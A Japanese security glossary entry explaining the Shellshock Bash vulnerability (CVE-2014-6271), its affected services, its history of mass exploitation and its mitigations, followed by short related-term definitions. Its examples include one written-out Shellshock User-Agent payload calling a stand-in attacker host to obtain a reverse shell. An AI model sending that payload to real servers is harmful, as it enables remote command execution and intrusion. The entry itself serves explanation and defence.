脆弱性
Shellshock (CVE-2014-6271)
別称: Bashdoor, CVE-2014-6271
定義
2014 年に公表された GNU Bash の脆弱性。他のプログラム経由で細工した環境変数を Bash に渡すだけで任意コマンドを実行できた。
Shellshock(CVE-2014-6271 と関連 CVE-2014-7169)は、GNU Bash が環境変数に格納された関数定義を解析する際、関数本体の後にあるコマンドをシェル起動時に実行してしまう欠陥でした。CGI スクリプト、DHCP クライアント、OpenSSH ForceCommand、qmail など多数のサービスが攻撃者制御下の環境変数で Bash を起動するため、リモートかつしばしば root としての悪用が極めて容易でした。2014 年の公開により世界規模の緊急パッチ対応と、ボットネット・Webshell・ワームによる大規模悪用が発生しました。対策には、Bash の更新、Bash-CGI 構成からの移行、権限分離と環境変数受け渡しの制限による多層防御が必要です。
例
- User-Agent: () { :; }; /bin/curl attacker.com を Bash-CGI に送り、リバースシェルを得る。
- DHCP クライアントがオプション文字列を Bash フックスクリプトの環境変数として渡す挙動を悪用する。
関連用語
Command Injection
Command Injection — definition coming soon.
CVE(共通脆弱性識別子)
公開された各ソフトウェア・ハードウェア脆弱性に一意の識別子を付与し、業界全体で曖昧さなく参照できるようにする公的カタログ。
既知の悪用された脆弱性(KEV)
実環境での悪用が CISA(米国)によって確認され、公開 KEV カタログに追加された CVE。米連邦機関に対する修正期限の対象となる。
リモートアクセストロイの木馬(RAT)
感染端末を攻撃者がひそかに対話的に操作できるようにするマルウェア。隠された遠隔管理ツールに近い。
エクスプロイト
脆弱性を悪用して、コード実行・権限昇格・情報漏えいなど意図しない動作を引き起こすコード、データ、または手法。
権限昇格
本来付与された権限を超える権限を攻撃者が取得できる脆弱性の総称。例として一般ユーザーから管理者への昇格がある。